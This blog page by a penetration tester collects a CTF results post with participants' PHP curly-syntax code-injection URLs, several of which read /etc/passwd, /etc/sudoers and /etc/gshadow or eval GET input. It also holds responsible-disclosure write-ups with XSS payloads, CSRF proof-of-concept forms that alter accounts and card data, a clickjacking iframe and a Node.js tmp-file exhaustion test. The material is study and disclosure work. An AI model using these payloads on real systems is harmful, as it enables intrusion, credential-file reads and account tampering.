Garage4Hackers CTF web level 1 challenge result

December 27, 2013

The Garage4Hackers CTF level 1 challenge came to life on 25th December, 2013 at 10:30 PM IST. It saw nice participation from across the globe with some really creative attempts to crack the challenge. It took us some serious judging to filter out the top attempts. Finally we are done with it. And now we are pleased to announce the results of our Level 1 challenge !!

The Challenge was http://54.197.234.66/index.php?wish=hohohoSanta :

To try to execute simple PHP code or pwn the server and try to update the http://54.197.234.66/updateme.txt.

Also,

safemode=on

List of disabled functions:
dl,exec, passthru, shell_exec, system, proc_open, popen ,curl_exec, curl_multi_exec , parse_ini_file, show_source, url_exec, syslog, pcntl_alarm, pcntl_fork, pcntl_waitpid, pcntl_wait, pcntl_wifexited, pcntl_wifstopped, pcntl_wifsignaled ,pcntl_wexitstatus, pcntl_wtermsig, pcntl_wstopsig, pcntl_signal, pcntl_signal_dispatch, pcntl_get_last_error, pcntl_strerror, pcntl_sigprocmask, pcntl_sigwaitinfo, pcntl_sigtimedwait, pcntl_exec, pcntl_getpriority, pcntl_setpriority, allow_url_fopen, allow_url_include, stream_select

expose_php = Off
display_errors = Off
track_errors = Off
html_errors = Off

Vulnerability Description :

I would like to give special thanks to David Vieira-Kurz(@secalert) for finding this awesome bug on Ebay. This kind of vulnerability was less known until lately when it shot to limelight (http://www.secalert.net/2013/12/13/ebay-remote-code-execution/) . We decided to make Level 1 challenge based on this vulnerability and tried to emulate the same flaw as in the case of eBay. For more details on the vulnerability check following blogs.


http://www.secalert.net/2013/12/13/ebay-remote-code-execution/
http://gynvael.coldwind.pl/n/ebay_rce_analysis_wrong_question_mark

Submissions from approximately 400 participants

We saw approximately 400 individual participants looking to grab the prize. Payload attempts ranged from the blunt nessus scanners to really cool “insert the coolest attack here ”attacks.

We have decided to release the total apache log generated during the challenge. You can download it by emailing us.

Top submissions are based on best payload and then 1st come 1st out basis in case of same payload.

Top submissions

1. Xelenonz Lp.

http://54.197.234.66/index.php?wish[]=x

http://54.197.234.66/index.php?wish={${phpinfo()}}

http://54.197.234.66/index.php?wish={${highlight_file('./index.php')}}

http://54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','Xelenonz',FILE_APPEND)}};

http://54.197.234.66/index.php?wish={${eval($_GET['code'])}}&code=file_put_contents('updateme.txt','Xelenonz',FILE_APPEND);

http://54.197.234.66/index.php?wish={${print_r(glob("/tmp/*"))}}

http://54.197.234.66/index.php?wish={${print_r(scandir($_GET['dir']))}}&dir=/tmp

2. Pichaya Morimoto(LongCat)

http://54.197.234.66/index.php?wish={${readfile('/tmp/lnz')}}

http://54.197.234.66/index.php?wish={${include('/tmp/lnz')}}

http://54.197.234.66/index.php?wish={${print_r(stat("updateme.txt"))}}

http://54.197.234.66/index.php?wish={${file_put_contents("/tmp/lnz",base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg=="))}}

http://54.197.234.66/index.php?wish=/index.php?wish={${read_file('index.php')}}

3. Mykola Ilin – solarwind [Defcon Ukraine]

http://54.197.234.66/index.php?wish=${include "/proc/cpuinfo"}

http://54.197.234.66/index.php?wish=${include "/etc/passwd"}

http://54.197.234.66/index.php?wish=${var_dump(glob("/proc/self/fd/*"))}

http://54.197.234.66/index.php?wish=${var_dump(glob("/etc/*"))}

http://54.197.234.66/index.php?/index.php?wish=${file_put_contents("updateme.txt","\\nsolarwind\\n",FILE_APPEND)}

4. Pedro [tunelko]

http://54.197.234.66/index.php?wish=${var_dump(base64_decode('PD8gcGhwaW5mbygpOyBkaWUoKTs/Pg=='))}

http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/sudoers'))}

http://54.197.234.66/index.php?wish=${var_dump(file_get_contents('/etc/gshadow'))}

http://54.197.234.66/index.php?wish=${var_dump(ini_get('disable_functions'))}

http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt","\nsolarwind\n",FILE_APPEND)}

5. Nishant

54.197.234.66/index.php?wish={${phpinfo()}}

54.197.234.66/index.php?wish={${file_put_contents('updateme.txt','nishant.dp@gmail.com at Thu, 26/12/2013 1:25AM IST')}}

6. Bharadwaj Machiraju

54.197.234.66/index.php?wish={${phpinfo()}}

http://54.197.234.66/index.php?wish=${file_put_contents("updateme.txt", "\ntunnelshade\n", FILE_APPEND)}

7. Rahul Mali

54.197.234.66/index.php?wish={${phpinfo()}}
54.197.234.66/index.php?wish={${fwrite(fopen("updateme.txt","a"),"Rahul%20Mali%20(rahulmali31415@gmail.com)")}}

8. Piyush Pattanayak

54.197.234.66/index.php?wish={${phpinfo()}}

54.197.234.66/index.php?wish=shoes({${file_put_contents('updateme.txt', 'Piyush Pattanayak', FILE_APPEND)}})

————————————————————————-
Note: Everyone tried execute PHP Curly Syntax as per our log information .However we can also execute the PHP code in the following way.

http://54.197.234.66/index.php?wish=%22%2bphpinfo%28%29%2b%22
http://54.197.234.66/index.php?wish=".phpinfo()."

————————————————————————-

AND THE WINNERS ARE

Xelenonz Lp. and Solarwind

G4h T-shirt

We Provide Penetration Testing

Intersting Vulnerability in express.bodyParser [Node.js]

December 13, 2013

HTML Code :

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Please login!</title>
</head>
<body>
<div id="contact">
<h1>Send an email</h1>
<form action="http://application.nodejs/authenticate" method="post">
<fieldset>
<label for="name">Username:</label>
<input type="text" id="username" name="username" placeholder="Username" />
<label for="Password">Password:</label>
<input type="password" id="password" autocomplete="off" />
<input type="submit" value="Authenticate" />
</fieldset>
</form>
</div>
</body>
</html>

Node JS code :
var express = require('express');
var app = express();
app.use(express.bodyParser());
app.post('/authenticate',function(req, res) {
authenticate(req.params.username,req.params.password);
});
app.listen(80, function() {
console.log('Server running...');
});

As the information is given in the code is very limited / not enough. The code for authenticate may be necessary for further deep testing but there is one server vulnerability which can lead to server crash / hang

Vulnerability possible classification
1) Filling up the complete TMP disk space vulnerability.

Explanation For Vulnerability 1 :
First, the above code look so innocent, However this is very common type of vulnerability , which is known by the most of developers. In the above code we are using express.bodyParse in the Line number 1 , and obviously it is vulnerable to an attack to create unlimited number of files on the server. Which can lead to filling up the disk and lead to an unwanted memory consumption, possibly server will get hanged.

Second, on the line number 4 we are using app.use(express.bodyParser()); this can lead to upload the tmp files on the server for every POST request. For Instance, to test the vulnerability , try to execute the above vulnerable code.

Before execution check the tmp files count .
Step 1 :
g4h-root$ ls /tmp | wc -l
1336

Step 2:
$ curl -X POST -F test=@tmp/test.p http://localhost/check
ok

Or

wget –post-file=@tmp/test.p http://localhost/check
ok

Step 3:
g4h-root$ ls /tmp | wc -l
1337 (Count is increased)

Mitigation of vulnerability 1 :
1) As this method is deprecated into express.js and common mitigation is , when every time code is executed then delete the TMP files.
2) Avoid using bodyParser and try to use defer option in the multipart middleware

Check out for more details of this vulnerability here : andrewkelley.me/post/do-not-use-bodyparser-with-express-js.html

We Provide Penetration Testing

Nullcon Jailbreak 2013 Challenge

November 29, 2013

Those who, don’t know what is Nullcon Jailbreak , This is hermetic place for hackers. In additional, there is no word called palliate in the #NULLCON Jailbreak dictionary. My team target was to complete hacking challenges & finding serious vulnerability in applications. Watch Nullcon Jailbreak Episode 1 & 2, there is something special regarding our BlackFog team, I hope you will enjoy the Episodes.

Nullcon Jailbreak Episode 1 :

Nullcon Jailbreak Episode 2 :

Nullcon Jailbreak Final Episode 2 :

Read about more about Nullcon Jailbreak,
http://www.redbull.in/cs/Satellite/en_IN/Article/Hacker-Mania-at-JailBreak-2013-021243337433222

Thank you #Nullcon Jailbreak for such nice program :p

We Provide Penetration Testing

Reflected XSS on tryPair.com

September 24, 2013

It’s my very old XSS finding , i just found my HDD. Seems they have closed down their application.

POC:

Response :

We Provide Penetration Testing

Responsible Responsible Disclosure Split Wise Stored XSS

Splitwise is a Providence, RI based company that makes it easy to split bills with friends and family and yes i am user of Split wise. Recently, found stored XSS in Split wise add amount module.  This can be used to easily steal the cookies of the our friend as well as make it was possible redirect page to other page, where victim can be trapped easily.

Reported this bug on Aug 21 2013 and fixed on next day :)

POC:

Following payload executed successfully

< script >(sessionStorage[!-1]=alert)(!-1) < / s cript>

” > < s  cript> Alert(1)< / script>

 

Iframe execution demonstration

 

Thanks for sending me T-shirt and some more security bugs are on the way :)

 

We Provide Penetration Testing

What i am doing ?

September 20, 2013

Don’t except anything Sci-Fi ,  Here is answer.

 Thinking, Knowing, Remembering, Judging, and Problem-solving .. 

We Provide Penetration Testing

Add new Application & Change User’s Avatar CSRF Vulnerability – X.com

July 19, 2013
 X.com bug bounty is running under the Paypal bug bounty program and i got paid .
Bug1  Add new Application : 
X.com provided option to add the new application in account settings. Due to missing of CSRF token this vulnerability successfully executed and unauthorized application is added anonymously in the user’s account .
CSRF Vulnerable URL : https://www.x.com/user/my-account/applications/new

To reproduce this vulnerability i have attached Proof Of Concept ..

Direct Download Link of POC :

https://dl.dropbox.com/u/18007092/x.com%20CSRF%20new%20Application.html

Bug2 Change User’s Avatar
X.com allow to change user’s default avatar.
I found the there is CSRF token is missing in avatar change module , this can be used to set  user’s default avtar forcefully.
POC :
<form action=”https://www.x.com/user/select_avatar/2” method=”GET”>
<input type=”submit” name=”submit”>
</form>
Thank you Paypal & X.com for running such a good program – g4h Team.
We Provide Penetration Testing

Blind Sql injection Redbus.in [Responsible Disclosure]

July 4, 2013

Redbus is Largest Online Bus Ticket Agent in India. Redbus suffered with highly critical vulnerability Bsql Injection.

Vulnerable URL :  http://www.redbus.in/Feedback/Thankyou.aspx?injectionVar=InjectionPayload

User-Agent:  Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Host IP: 175.41.131.205

Web Server: Microsoft-IIS/7.0

Powered-by: ASP.NET

Using this exploit i was able to access DB information like tables and columns.  Sorry Reader this time i can not post complete details of POC or Vulnerability

Redbus message

Thank you redbus for fixing this bug . I use redbus for ticketing, so I feel redbus must be more secured 😉

Special thanks to Garage4hackers Team

– [S]

We Provide Penetration Testing

Change OAuth Target URL & Domain Description [ UI redress attack ]

May 10, 2013

I forgot to blog about my another Google bug.  Now a days i am got busy in my start up project ! I hope so i will back soon on bug bounty will have some god blog out ! :)

To Change OAuth Target URL & Domain Description Can be achieved using Clickjacking Vulnerability . Click Jacking is commonly know as OWASP Top 10 Vulnerability.

Status: Fixed

OAuth is cool and simple to understand developer can integrate with Google ‘s OAuth endpoints seamlessly and effortlessly . Google Provider a Panel to manage the Return URL & Domain Description by using following URL.

Vulnerable URL : https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com

On the page there two input box called as Target URL path prefix: & Domain description: where use submit Domain & description information.

As Shown in the following Image :

Change OAuth Domain & Description

POC : < i f r a m e s r c = “https://accounts.google.com/ManageDomain?authsub_msd=anydomain.com” width=”600″ height=”600″> // Not actual POC

Header Information :

As you can see missing Header information in the below Header Information

Host: accounts.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Special thanks to Google Security Team & G4H(garage4hackers.com) Team ..

We Provide Penetration Testing

Papal service Zong Update Credit Card & Billing Information CSRF

March 12, 2013

Vendor product Brief Information: Zong aim Frictionless Mobile Payments to the world. Zong processing millions of payments a month in over 40 countries worldwide.

CSRF Vulnerable URL: https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink

CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated(OWASP).

POC:

<form action=”https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink” method=”post” name=”manageCreditCardForm” id=”manageCreditCardForm”>
<input type=”hidden” name=”consumer_id” value=”10053353027″ id=”consumer_id”>
<input type=”hidden” name=”is_update” value=”false” id=”is_update”>

<label for=”billing_first_name”>First name </label>

<input type=”text” class=”text required” id=”billing_first_name” name=”billing_first_name” value=”sandeep”>
<label for=”billing_last_name”>Last name</label>
<input type=”text” class=”text required” id=”billing_last_name” name=”billing_last_name” value=”kamble”>
<label for=”billing_card_type”>Card type</label>
<select name=”billing_card_type” class=”select1″ id=”billing_card_type”>
<option value=”Visa”>Visa</option>
<option value=”MasterCard”>MasterCard</option>
<option value=”AmericanExpress”>American Express</option>
<option value=”Discover”>Discover</option>
</select>

<label for=”billing_card_number”>Card number</label>

<input type=”text” class=”text required” id=”billing_card_number” name=”billing_card_number” value=”442411000016″>

<label for=”billing_exp_month”>Expiration date</label>
<select name=”billing_exp_month” class=”select2″ id=”billing_exp_month”>
<option value=”-1″>Month</option>
<option value=”1″>1</option>
<option value=”2″>2</option>
<option value=”3″>3</option>
<option value=”4″>4</option>
<option value=”5″>5</option>
<option value=”6″>6</option>
<option value=”7″>7</option>
<option value=”8″>8</option>
<option value=”9″>9</option>
<option value=”10″>10</option>
<option value=”11″>11</option>
<option value=”12″>12</option>
</select>
<select name=”billing_exp_year” class=”select2″ id=”billing_exp_year”>
<option value=”-1″>Year</option>
<option value=”2013″>2013</option>
<option value=”2014″>2014</option>
<option value=”2015″>2015</option>
<option value=”2016″>2016</option>
<option value=”2017″>2017</option>
<option value=”2018″>2018</option>
<option value=”2019″>2019</option>
<option value=”2020″>2020</option>
<option value=”2021″>2021</option>
<option value=”2022″>2022</option>
<option value=”2023″>2023</option>
</select>

<label for=”billing_cvv”>Security code</label>
<input type=”text” class=”cvv required” id=”billing_cvv” maxlength=”4″ name=”billing_cvv” value=””>
<button type=”submit” id=”_eventId_continue” name=”_eventId_continue” value=”continue” class=”enterBtn”><span>Link Card</span></button>
</form>

 

Thanks PP for such good bounty Program & PP security Team for fixing bug quickly :) .
Special thanks to My G4H Team.

–[S]

We Provide Penetration Testing


We Provide Penetration Testing